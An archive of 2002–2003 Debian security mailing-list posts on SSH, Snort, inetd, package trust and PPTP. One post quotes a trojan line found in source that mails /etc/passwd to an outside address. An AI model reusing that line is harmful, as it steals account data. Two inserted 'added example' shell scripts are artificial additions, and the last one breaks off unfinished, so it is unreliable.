 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~




msg07983/pgp0.pgp
Description: PGP signature


Removing stupid HTTP methods from Apache

2002-12-03 Thread Anne Carasik
Hi all,

I'm running Apache on a Woody machine, and I can't figure
out for the life of me how to disable certain insecure HTTP
methods like PROPFIND and PUT.

Can someone please help me out? I've been searching through
the docs and google, and I'm hoping I just overlooked something
obvious.

TIA,

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~




msg08004/pgp0.pgp
Description: PGP signature


Re: SSH

2002-12-18 Thread Anne Carasik
Adrian 'Dagurashibanipal' von Bidder grabbed a keyboard and typed...
> As I said, I was not closely following the story, but IIRC the SSH
> Protocol version 1 has a principal design flaw that *can* *not* *be*
> *fixed* without breaking the protocol.

That is correct. I've had long discussions with Tatu Ylonen on this
when I was at SSH.com.

> There were, of course, additional issues with implementations, but ssh1
> never really was secure, and never will be. I'm not making any statement
> about the practical relevance of the attack here, nor do I know of any
> successful break in using this weakness, so YMMV.

Arcfour (RC4), the CRC32 attack, and the Secure RPC were problems
addressed by later versions of OpenSSH and SSH1 releases.

There are other problems too--and you're right--fixing them would
break SSH1. Instead, SSH2 was written to address these issues from
the ground up.

From what I remember, one of the biggest problems in SSH1 is that 
it uses weak authentication for the packets. There are other problems 
too, and the VUs issued by CERT only cover a portion of the issues.

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~






Question about snort binaries..

2003-01-30 Thread Anne Carasik
Hi all,

This may be a stupid question, but I'm going to ask anyway :)

Debian 3.0 uses Snort 1.8.4beta1, and unstable uses 1.9.0.

Is there a way to define that I only want to use the unstable
packages just related to snort or do I have to change my entire
distribution to unstable? Testing distribution has 1.8.7.

The problem I have is the snort rules are updated for 1.9.0,
but not for 1.8.4beta1 :(

Also, if you look at snort-rules-default for the different releases,
there is a BIG difference in sizes:

1.8.4 beta 1 58.1K
1.8.7        73.7k
1.9.0 rel 2  91.7

Any other suggestions or recommendations are also welcome.

Thanks,

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~






Re: Question about snort binaries..

2003-01-30 Thread Anne Carasik
Noah L. Meyerhans grabbed a keyboard and typed...
> On Thu, Jan 30, 2003 at 09:35:05AM -0800, Anne Carasik wrote:
> > Is there a way to define that I only want to use the unstable
> > packages just related to snort or do I have to change my entire
> > distribution to unstable? Testing distribution has 1.8.7.
> No.  You would have to pull in all the dependencies from unstable as
> well, so you'd get all sorts of fun stuff like libc upgraded.

Yeah, I realized that, then I figured out what to do :)

> It's possible that you could try 'apt-get -b source snort' and have the
> right thing happen.  But then again, depending on the package in
> unstable, this might not be buildable on something else.

Right. So, here's what I've been doing:

edit /etc/apt/apt.conf to have the following:
APT::Default-Release "testing";

(I'm using testing instead of stable).

And, for the packages I want the latest release for, I've been
doing this:

apt-get -t unstable install snort
apt-get -t unstable install ssh
etc.

So far, I haven't had any problems :)

> > Any other suggestions or recommendations are also welcome.
> Go to www.snort.org, get the tarball, and install it in /usr/local/.
> That's what I've been doing.

That would have been my next step if the above didn't work.

> This was discussed at quite a bit of length a month or two ago.  Check
> the archives.

I saw something on snort-current about keeping rules up to date, but I 
don't remember anything about the binaries.

I'll go poke through the archives.

Thanks for your help :)

-Anne
-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~






Re: configure ssh-access

2003-07-07 Thread Anne Carasik
Why not just limit the access through SSH public key?
It sounds like that would accomplish what you're trying
to do.

-Anne

[EMAIL PROTECTED] grabbed a keyboard and typed...
> Hi!
> 
> I want to make ssh-access possible only from a restricted
> number of hosts - those that are named in /etc/hosts.allow.
> Users who want to login have a DynDNS host-name that shall
> be listed in hosts.allow to make it possible for users with
> a dial-up internet connection, too.
> 
> BUT:
> The problem is that I can only login to the ssh-machine
> when I enter the IP-address to the hosts.allow file.
> Specifying the hosts DNS-name does not work!
> 
> AND:
> I'd prefer to specify the rules for logging into the machine
> in the sshd_config-file, not in hosts.allow/deny.
> But the AllowHosts/DenyHosts-options that could be used in 
> /etc/sshd_config earlier seem to be not any
> longer available at the SSH-version I'm using. 
> It's: openssh-3.4p1-80 on a SuSE 8.1
> 
> Has anybody ideas on these 2 problems?
> 
> thx in advance,
> Klaus
> 
> 
> 
> -- 
> Klaus Siegesleitner - [EMAIL PROTECTED] 
> SysAdmin at CAME (Center of Applied Molecular Engineering) 
> University of Salzburg, Jakob-Haringerstrasse 5, A-5020 Salzburg
> 
> 

-- 
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   gator at cacr dot caltech dot edu 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: failed ssh breakins on my exposed www box ..

2002-03-24 Thread Anne Carasik

You could also TCP Wrap the services.

That drops the BS quite a bit. :)

-Anne

On Sun, Mar 24, 2002 at 11:44:26AM -0500, Gary MacDougall wrote:
> I get these all the time.
> 
> I've come to expect people to do this.  It sucks, but hey,
> what can you do.  I'm fed up trying to report and chase them down.
> 
> We seriously need a US branch of the law-enforcement to deal
> with this sort of stuff.  I think if more people got prosecuted for
> trying to crack into a site, the level of BS would drop to zero.
> 
> Yeah, yeah, you can argue all you want about cracking and how
> valuable it is to keep a product secure.  But if you apply that logic
> to the real world, robbing a bank wouldn't be a federal offense,
> and it would be like a speeding ticket...
> 
> g.
> 
> 
> - Original Message -
> From: "shiftee" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Sunday, March 24, 2002 11:35 AM
> Subject: Re: failed ssh breakins on my exposed www box ..
> 
> 
> > Hi,
> >
> > To find out who owns the IP block you can do 'whois -h whois.arin.net
> '.
> >
> > I don't think reporting it would achieve anything, just a friendly
> > warning from the ISP to the user in question.
> >
> > On Sun, Mar 24, 2002 at 08:01:04AM -0800, Stephen Hassard wrote:
> > > sorta what I figured, but it was a pretty half assed attempt. :P
> > >
> > > on a side note, are these typically worth reporting to the ISP of the
> > > attacker? I tried doing a DNS lookup on the box in question, but it
> > > doesn't seem to have an FQDN registered. What's the best way to figure
> > > out the admin for a subnet from a machine's IP?
> > >
> > > Thanks,
> > > Steve
> > >
> > > shiftee wrote:
> > > > It just looks like someone is trying to brute-force an account, I'm
> > > > sure there are plenty of places that provide tools for this.
> > > >
> > > > Just make sure you enforce secure passwords, and keep an eye on your
> > > > syslog.
> > > >
> > > > On Sun, Mar 24, 2002 at 07:11:25AM -0800, Stephen Hassard wrote:
> > > >
> > > >>Hi there,
> > > >>
> > > >>I found these in my event log from yesterday:
> > > >>
> > > >> >>>
> > > >>Mar 23 09:33:16 www sshd[10998]: input_userauth_request: illegal user
> www
> > > >>Mar 23 09:33:18 www sshd[10998]: Failed none for illegal user www from
> > > >>213.26.96.103 port 2276 ssh2
> > > >>Mar 23 09:33:18 www sshd[10998]: Failed keyboard-interactive for
> illegal
> > > >>user www from 213.26.96.103 port 2276 ssh2
> > > >>Mar 23 09:33:18 www sshd[10998]: Failed password for illegal user www
> > > >>from 213.26.96.103 port 2276 ssh2
> > > >>Mar 23 09:33:19 www sshd[10997]: input_userauth_request: illegal user
> oracle
> > > >>Mar 23 09:33:19 www sshd[10997]: Failed none for illegal user oracle
> > > >>from 213.26.96.103 port 2275 ssh2
> > > >>Mar 23 09:33:19 www sshd[10997]: Failed keyboard-interactive for
> illegal
> > > >>user oracle from 213.26.96.103 port 2275 ssh2
> > > >>Mar 23 09:33:19 www sshd[10997]: Failed password for illegal user
> oracle
> > > >>from 213.26.96.103 port 2275 ssh2
> > > >>Mar 23 09:33:19 www sshd[10999]: input_userauth_request: illegal user
> test
> > > >>Mar 23 09:33:19 www sshd[10999]: Failed none for illegal user test
> from
> > > >>213.26.96.103 port 2277 ssh2
> > > >>Mar 23 09:33:19 www sshd[10999]: Failed keyboard-interactive for
> illegal
> > > >>user test from 213.26.96.103 port 2277 ssh2
> > > >>Mar 23 09:33:20 www sshd[10999]: Failed password for illegal user test
> > > >>from 213.26.96.103 port 2277 ssh2
> > > >><<<
> > > >>
> > > >>It seems that from the timestamp that it's most likely a script kiddy;
> > > >>The time duration between failed password attempts seems really short.
> > > >>I'm just wondering if anyone's seen a script that does this and is
> > > >>available widely, or is it a good chance that I've got someone trying
> to
> > > >>break in? None of my other services seem to have been probed, just
> ssh.
> > > >>
> > > >>Thanks,
> > > >>Steve
> > > >>
> > > > >
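
The sshd lines quoted in the message above, summarised per source address, as an added example that is not part of the original thread. The function names are hypothetical, the sample reproduces the quoted log with the mail line-wrapping undone, and the final sample line (192.0.2.10, user steve) is constructed for contrast.

```shell
#!/bin/sh
# Added example: summarise failed sshd logins per source address.
# sample_log holds the lines quoted in the thread (unwrapped). The last line
# is constructed: one mistyped password for a real account, for comparison.
sample_log() {
cat <<'EOF'
Mar 23 09:33:16 www sshd[10998]: input_userauth_request: illegal user www
Mar 23 09:33:18 www sshd[10998]: Failed none for illegal user www from 213.26.96.103 port 2276 ssh2
Mar 23 09:33:18 www sshd[10998]: Failed keyboard-interactive for illegal user www from 213.26.96.103 port 2276 ssh2
Mar 23 09:33:18 www sshd[10998]: Failed password for illegal user www from 213.26.96.103 port 2276 ssh2
Mar 23 09:33:19 www sshd[10997]: input_userauth_request: illegal user oracle
Mar 23 09:33:19 www sshd[10997]: Failed none for illegal user oracle from 213.26.96.103 port 2275 ssh2
Mar 23 09:33:19 www sshd[10997]: Failed keyboard-interactive for illegal user oracle from 213.26.96.103 port 2275 ssh2
Mar 23 09:33:19 www sshd[10997]: Failed password for illegal user oracle from 213.26.96.103 port 2275 ssh2
Mar 23 09:33:19 www sshd[10999]: input_userauth_request: illegal user test
Mar 23 09:33:19 www sshd[10999]: Failed none for illegal user test from 213.26.96.103 port 2277 ssh2
Mar 23 09:33:19 www sshd[10999]: Failed keyboard-interactive for illegal user test from 213.26.96.103 port 2277 ssh2
Mar 23 09:33:20 www sshd[10999]: Failed password for illegal user test from 213.26.96.103 port 2277 ssh2
Mar 23 10:02:41 www sshd[11050]: Failed password for steve from 192.0.2.10 port 40112 ssh2
EOF
}

# Reads syslog text on stdin and prints one line per source address:
#   <ip> <failed attempts> <distinct usernames> <attempts on unknown users> <seconds first..last>
# Assumes the OpenSSH wording shown in the thread ("illegal user"; later
# releases say "invalid user") and that all lines fall on the same day.
ssh_failed_summary() {
    awk '
    function secs(hms,   t) { split(hms, t, ":"); return t[1] * 3600 + t[2] * 60 + t[3] }
    $5 ~ /^sshd\[[0-9]+\]:$/ && $6 == "Failed" {
        # Each line ends "... from <ip> port <n> ssh2". Search from the right
        # so that a username of "from" cannot shift the fields.
        f = 0
        for (i = NF - 2; i > 7; i--)
            if ($i == "from" && $(i + 2) == "port") { f = i; break }
        if (!f) next
        ip = $(f + 1); user = $(f - 1)
        n[ip]++
        if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
        if ($(f - 2) == "user" && ($(f - 3) == "illegal" || $(f - 3) == "invalid"))
            unknown[ip]++
        if (!(ip in first)) first[ip] = secs($3)
        last[ip] = secs($3)
    }
    END {
        for (ip in n)
            printf "%s %d %d %d %d\n", ip, n[ip], users[ip], unknown[ip], last[ip] - first[ip]
    }' | sort
}

# Prints the addresses that tried at least MIN_USERS different usernames,
# the pattern the thread reads as scripted guessing.
ssh_guessing_sources() {
    ssh_failed_summary | awk -v min="$1" '$3 >= min { print $1 }'
}

sample_log | ssh_failed_summary
```

On a live system the same functions can be fed from the file sshd logs to, for example `ssh_guessing_sources 3 < /var/log/auth.log` where that is the configured path.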

Re: A question about some network services

2002-04-02 Thread Anne Carasik

On Tue, Apr 02, 2002 at 07:45:21PM +0200, eim wrote:
> A question about some network services
> ==
> 
> Hallo Debian folks,
> 
> By default, on my debian boxes, I disable these network
> services which are enabled automatically during a fresh
> Debian stable aka "potato" installation:
> 
>   * daytime
>   * time
>   * discard
> 
> All these services are started from inet.d / xinet.d
> so I can easily disable them via "update-inetd", 
> so my only question is: 
> 
>   Why are these services enabled by default and
>   for 'what' exactly do we need them ?

Well, daytime spits out the time of day, time is for NTP,
and I'm not sure what discard is used for.

I usually turn off inetd completely. It helps make things
quieter on a nessus scan :)

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: A question about some network services

2002-04-04 Thread Anne Carasik

On Tue, Apr 02, 2002 at 01:34:32PM -0500, Noah L. Meyerhans wrote:
> > Well, daytime spits out the time of day, time is for NTP,
> > and I'm not sure what discard is used for.
> No, NTP does not use the time port.  It uses port 123 (ntp in
> /etc/services).

Ok, figures I don't know since I don't use it.

> Discard is the network equivalent of /dev/null

W.. an MTU of zero :)

> The question of what to do with these ports comes up every once in a
> while on this list.  Some people prefer to leave them on, others turn
> them off.  I don't think there's ever been an exploit that involves
> these ports, as the code is quite simple (i.e. easy to implement
> securely).

Occasionally, there may be a DOS attack, but nothing invasive.

> > I usually turn off inetd completely. It helps make things
> > quieter on a nessus scan :)
> Yes, this is good advice, and something that never occurs to most
> people.  Most common services these days run quite happily in standalone
> mode, so there's often no reason to use inetd at all.

Given most everything can run through SSH or SSL (at least TCP-based) :)

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: A question about some network services

2002-04-05 Thread Anne Carasik

Generally, I just disable the inetd script from the /etc/init.d
directory.

You never know if you're going to need it. Removing the package
is definitely not the same as disabling it.

Michal is right: disable <> wipe it out :)

-Anne

On Fri, Apr 05, 2002 at 04:31:19PM +0200, Michal Melewski wrote:
> > Yikes! I guess, you didn't remove inetd that way, right? But how then?
> I think that you should just turn it off :)
> 'Don't' use isn't equal to 'wipe it out' 
> 
> > Namarie!
> > Juku
> 
> -- 
> Michael "carstein" Melewski|  "One day, he said, in a taped segment   
> [EMAIL PROTECTED]   |   that suggested chemical interrogation,
> mobile:   502 545 913  |   everything had gone gray."
> gpg: carstein.c.pl/carstein.txt|   -- Corto , 'Neuromancer'



-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: does virus ELF.OSF.8759 affect debian?

2002-04-10 Thread Anne Carasik

On Wed, Apr 10, 2002 at 10:52:38AM -0700, Brandon High wrote:
> And another reason not to run as root...

Compile from source is a good idea too. It's amazing what you
can find in the source. I found a couple of stupid Trojans
that way.

   system("mail /etc/passwd [EMAIL PROTECTED]");

*sigh*

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: does virus ELF.OSF.8759 affect debian?

2002-04-10 Thread Anne Carasik

On Wed, Apr 10, 2002 at 05:46:24PM -0400, Dominique Fortier wrote:
> > Basically, if you run binaries from an unsafe source, you get what you
> > deserve.
> 
> Man, I try to be an honest individual, I hope I don't deserve something
> like that !
> 
> ..., Is there such a thing as a 100% safe source for binaries ?

Check the PGP key (or GnuPG key) and the md5 checksum from the source
(as long as you trust the source).

Even trusted sources (like ftp.porcupine.org/pub/security) get hit
with Trojan horses. Always check the digital signatures and the
checksums!

Debian does this when you do an apt-get, I believe.

-Anne
-- 

      .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: Bastian Gl??er/PD/Kreditwerk is out of the office.

2002-04-12 Thread Anne Carasik

No Perl? ;)

-Anne

On Fri, Apr 12, 2002 at 10:09:27PM +0300, Edmunds wrote:
> Hi All,
> 
> I know that Debian origin is Deutschland, but for a good style in mailing
> lists I think we should use English or C :)
> 
> Debian user
> 
> 
> - Original Message -
> From: "Dennis Stampfer" <[EMAIL PROTECTED]>
> To: "Bastian Gl??er" <[EMAIL PROTECTED]>;
> <[EMAIL PROTECTED]>
> Sent: Friday, April 12, 2002 8:49 PM
> Subject: Re: Bastian Gl??er/PD/Kreditwerk is out of the office.
> 
> 
> > On Fri, Apr 12, 2002 at 08:33:06PM +0200, Bastian Gl??er wrote:
> > > I will be out of the office from 26.03.2002. I will return on 23.12.2024.
> > >
> > > I will no longer reply to your message at all.
> >
> > oh, no. Will that autoreply continue to 2024?
> >
> >
> >
> >
> >
> >
> 
> 
> 
> 
> 

-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: does virus ELF.OSF.8759 affect debian?

2002-04-17 Thread Anne Carasik

On Wed, Apr 17, 2002 at 12:13:46PM +0300, Jussi Ekholm wrote:
> Anne Carasik <[EMAIL PROTECTED]> wrote:
> > Compile from source is a good idea too. It's amazing what you
> > can find in the source. I found a couple of stupid Trojans
> > that way.
> > 
> >system("mail /etc/passwd [EMAIL PROTECTED]");
> Oh shit, that's evil. Where did you manage a software including this
> kind of source code in first place? Don't say freshmeat.net! Or
> sourceforge.net... I'm glad you were able to detect this and not run
> the software. 

I can't remember, other than some obviously suspect code. It was an ssh
trojan, if I remember correctly.

> Big sigh, indeed. I hate these script kiddies, crackers and people,
> who only does harm to other people online. Was it a take-over of
> an IRC channel, breaking to someone's system or whatever. I just
> hate these people. I've never seen computer, internet connection and
> everything related as a tools to cause harm and destruction. It's
> beyond me, what satisfaction does these persons get...

I don't think they have anything better to do (at least the script
kiddies). Some groups, like in the Middle East and China, feel that 
they have a sudden interest in attacking US sites.

However, I'm sure there are other groups attacking the Middle East and
China as well.

You should see some of the stupid stuff script kiddies leave on the
systems--they don't even change the mtime or the logs, not to mention
leave the code behind with URLs in it.

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: does virus ELF.OSF.8759 affect debian?

2002-04-17 Thread Anne Carasik

On Wed, Apr 17, 2002 at 05:06:03PM -0500, Bryan Andersen wrote:
> > Compile from source is a good idea too. It's amazing what you
> > can find in the source. I found a couple of stupid Trojans
> > that way.
> >system("mail /etc/passwd [EMAIL PROTECTED]");
> Yeh, and it's buggy too
> Take a close look at what really happens.

I'm sure it is. [EMAIL PROTECTED] doesn't exist. ;)

Seriously, I know it is. The other thing is, I use shadow most of the
time. Still, the username information is never a good thing to share.

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: Guarding against evil software installation scripts?

2002-04-18 Thread Anne Carasik

Dude, and I thought I'm paranoid :)

Even I trust the debian sources in /etc/apt/sources.list,
not without the PGP key or MD5 of course.

Just make sure the digital signature and/or MD5 checksum
comes from a trusted source. 

Unless, of course, you want to write your own code. :)

-Anne

On Wed, Apr 17, 2002 at 09:52:24PM -0700, Tim Freeman wrote:
> At the moment my system has 876 packages installed.  They were all
> installed by root.  Each package gets a chance to run an arbitrary
> shell script as root, so it seems to me that there must have been much
> more than 876 opportunities for my system to get utterly destroyed by
> absolute strangers.  So far, none of them decided to do me in.  It's
> surprising it all works so well.
> 
> This leads to some questions:
> 
> 1. Have there been problems with people submitting malicious packages,
>    or packages that were so buggy they might have well been malicious?
>    If so, what happened?
> 
> 2. Are there any ideas about how to tighten this up a bit?  Here are
>    some vague ideas:
> 
> 2a. I can vaguely imagine something where many packages run their
>     installation scripts under a user id unique to that package, so the
>     installation script is therefore unable to arbitrarily destroy
>     everything.  
> 
> 2b. It might be possible to do it with only one special user id for
>     package installs, where a root process chowns everything owned by
>     the package after the install script is complete, and chowns it
>     back before an uninstall script runs.  You'd need a separate
>     database that lists which files got chowned so you'll know to chown
>     them back later.
> 
> 2c. Perhaps something like XFS access lists could be used (if everyone
>     were running XFS) or SELinux or LIDS (where did the .deb for LIDS go,
>     by the way?)  I have no experience with any of these, so this may be
>     nonsense. 
> 
> I don't see a clear path to doing this the "right" way, where chaos is
> prevented by something more substantial than a social convention.  
> 
> I have to admit that the social convention is working very well at the
> moment, though.
> 
> -- 
> Tim Freeman   
> [EMAIL PROTECTED]
> 
> 
> 

-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: Lost root password!!

2002-04-23 Thread Anne Carasik

On Mon, Apr 22, 2002 at 04:12:02PM -0600, Stefan Srdic wrote:
> Last night when I attempted to change my root password passwd bunked out on me. It
> crashed and I received the following message on the console:
> 
> passwd: Critical error - immediate abort

Ooo...

> I thought that I could still use my old root password but cannot. I attempted to
> boot straight into a shell (init=/bin/sh) and manually expire my root password (so
> that I could change it on the next login) and ended up with the same results. I've
> also tried deleting the root passwd to see if I could then re-run passwd as root and
> change my passwd. No luck.

Have you used a rescue disk or installation CD?

> I can still log into my system as a normal user but cannot change any users
> passwords, I get the same error message as above.

Does your /etc/passwd or /etc/shadow have invalid entries, or has it gotten
corrupted?

> Is passwd in Woody broken? How can I fix my broken root password without harming my
> system?

I hope not :(

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: disable RPC

2002-04-24 Thread Anne Carasik

Try 

# apt-get remove --purge pkgname

That will remove anything related to the package (sometimes,
the directories aren't removed like /etc/pkgname).

Also, try 

# dpkg --get-selections | grep -i portmap

To see other packages related to RPCs..

-Anne

On Wed, Apr 24, 2002 at 11:26:16AM -0400, Andrew Kaplan wrote:
> How do I disable RPC. I know the scripts can be removed from init.d But I
> know there's a command similar to "apt-get remove ???" or something similar.
> That removes it completely.
> 
> Andrew P. Kaplan
> Network Administrator
> CyberShore, Inc.
> http://www.cshore.com
> 
> 
> "Somehow I imagined this experience would be more rewarding"  Calvin
> 
> 
> 
> 
> 
> 
> 

-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: PPTP with Encryption

2002-04-30 Thread Anne Carasik

Last time I checked, PPTP comes with encryption. All you
have to do is configure it.

From Freshmeat:
PoPToP
 
About:
PoPToP is a PPTP server for use in PPTP VPN environments. The current
release version supports Windows 95/98/NT/2000 PPTP clients and PPTP
Linux clients. With the relevant patches, PoPToP supports Windows PPTP
clients with the full range of encryption and authentication features. 

From apt-cache:
pptpd - PoPToP Point to Point Tunneling Server

I don't think you should have any patching to do. :) The home page
for poptop is at http://www.poptop.org.

-Anne

On Tue, Apr 30, 2002 at 10:54:24AM -0400, Derek J. Balling wrote:
> Does anyone have a nice simple HOWTO on how to add encryption to the 
> pptpd daemon, so that windows VPN users can connect using encryption? 
> Preferred methods do NOT include patching things, if possible, 
> because I'd like to not have to re-patch things every time new 
> upgrades come out.
> 
> Has anyone built all the necessary items simply as .deb's?
> 
> D
> 
> -- 
> +-+-+
> | [EMAIL PROTECTED]  | "Thou art the ruins of the noblest man  |
> |  Derek J. Balling   |  That ever lived in the tide of times.  |
> | |  Woe to the hand that shed this costly  |
> | |  blood" - Julius Caesar Act 3, Scene 1  |
> +-+-+
> 
> 
> 

-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: PPTP with Encryption

2002-04-30 Thread Anne Carasik

On Tue, Apr 30, 2002 at 12:03:09PM -0400, Derek J. Balling wrote:
> >I don't think you should have any patching to do. :) The home page
> >for poptop is at http://www.poptop.org.
> Not unless the packaged pptpd/ppp has something else, from the poptop.org 
> page:
> # Available PPPD patch allows Windows compatible encryption and 
> authentication (MSCHAPv2 and MPPE 40-128 bit RC4 encryption)

You're right.. (I guess you do want to encrypt to a Windows box, so
make sure you're using full strength RC4.. 40 bit keys can be brute
forced).

According to the poptop FAQ:
3.0 PPP (and MSCHAPv2/MPPE) Installation

It is only necessary to use PPP 2.3.8 if you want Microsoft compatible
MSCHAPv2/MPPE authentication and encryption. The reason for this is that
the MSCHAPv2/MPPE patch currently supplied (19990813) is against PPP
2.3.8. If you don't need Microsoft compatible authentication/encryption
any 2.3.x PPP source will be fine.

[...]

The instructions look like you need to make a kernel module. 

> So it seems like there's SOMETHING I need to add to pppd to get 
> encryption to work with it, and (from my reading) it seems like 
> there's a patch that also needs to go in the kernel to make that pppd 
> change work as well.

Out of curiosity, why PPTP? Why not IPSec? There's better compatibility
with IPSec (FreeSWAN), and it looks like poptop hasn't been updated in a
long time (since 1999). Also, Win2K and I think (don't quote me on this)
WinXP have builtin IPSec support.

-Anne
-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: PPTP with Encryption

2002-04-30 Thread Anne Carasik

On Tue, Apr 30, 2002 at 01:24:21PM -0400, Derek J. Balling wrote:
> >As a side note: have you considered that using the encryption in pptp
> >forces you to store userpasswords in cleartext? For my ISP [1] that was
> >a reason not to use pptp's encryption, especially since MS-CHAPv2
> >contains known security holes [2].
> 
> Yes, unfortunately, for our predominant workstation (Win98), M$'s 
> PPTP client is ubiquitous and other solutions are not necessarily so 
> commonly deployed.
> 
> D
> (who would LOVE to move to a _MORE_ secure solution, but is content, 
> for now, to only allow himself and one other to even have accounts on 
> the box with the cleartext passwds)

Ugh.. I'd never be content with cleartext passwords, especially given
how many security solutions are around today.

-Anne
--
  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: Safe to use Mindterm?

2002-05-13 Thread Anne Carasik

Security issues? Can you be more specific?

There aren't any security issues (yet) with the SSH 2.0 protocol.

From what I know, there aren't any issues using mindterm for 2.0
either :)

-Anne

This one time, Preben Randhol wrote:
> Hi
> 
> I'm looking for a way to log into my computer via ssh and a web browser.
> I see mindterm can do this, but last I checked it used ssh < 2.0, and I
> understood that there were security issues with this. Is that correct? 
> Are there any replacement software for mindterm?
> 
> Thanks for any hints in advance!
> 
> Preben
> 
> 
> 

-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: Safe to use Mindterm?

2002-05-13 Thread Anne Carasik

I thought there was.. Appgate is charging for it?!?

How sad, and they don't even list the price. *Sigh*

-Anne

This one time, Preben Randhol wrote:
> Thanks for your information, it was that I was looking for. I guess
> there are no mindterm clones out there with SSH 2.0 support (Open
> Source/Free Software of course)?
> 
> 
> -- 
> Preben Randhol --- http://www.pvv.org/~randhol/ --
>  "For me, Ada95 puts back the joy in programming."
> 
> 
> 

-- 

  .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~





Re: force to use SSH2

2002-05-13 Thread Anne Carasik

In sshd_config, make sure you only have protocol 2 defined:

Protocol 2

Then restart sshd.

-Anne

This one time, Eduardo Gargiulo wrote:
> Hi all.
> 
> Which is the best way to ensure that clients will connect using ssh2
> and not ssh1? How can I avoid the use of ssh1?
> 
> TIA
> 
> -- 
> Eduardo Gargiulo
> ^ejg(-.*)?@ar\.homelinux\.org$



-- 

      .-"".__."``".   Anne Carasik, System Administrator
 .-.--. _...' (/)   (/)   ``'   [EMAIL PROTECTED] 
(O/ O) \-'  ` -="""=.',  Center for Advanced Computing Research
~`~~
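
A way to confirm the `Protocol 2` change described in the message above, from the config file and from the server's identification string; this is an added example, not part of the original thread. The function names are hypothetical, the sample configs and banner strings are constructed, and the fallback value `2,1` for a file with no Protocol line is an assumption about OpenSSH releases of that period.

```shell
#!/bin/sh
# Added example: check that an sshd_config really leaves SSH protocol 1 off.

# Value sshd falls back to when the file has no Protocol line. "2,1" is an
# assumption for OpenSSH releases of the thread's era; adjust it to match the
# sshd_config(5) of the version actually installed.
SSHD_DEFAULT_PROTOCOL=${SSHD_DEFAULT_PROTOCOL:-2,1}

# Prints the Protocol value sshd would use for the given config file.
# sshd uses the first occurrence of a keyword, keywords are case-insensitive,
# and lines starting with "#" are comments.
effective_protocol() {
    awk -v def="$SSHD_DEFAULT_PROTOCOL" '
    /^[ \t]*#/ { next }
    { sub(/=/, " ") }                      # accept "Protocol=2" as well
    tolower($1) == "protocol" && !found { value = $2; found = 1 }
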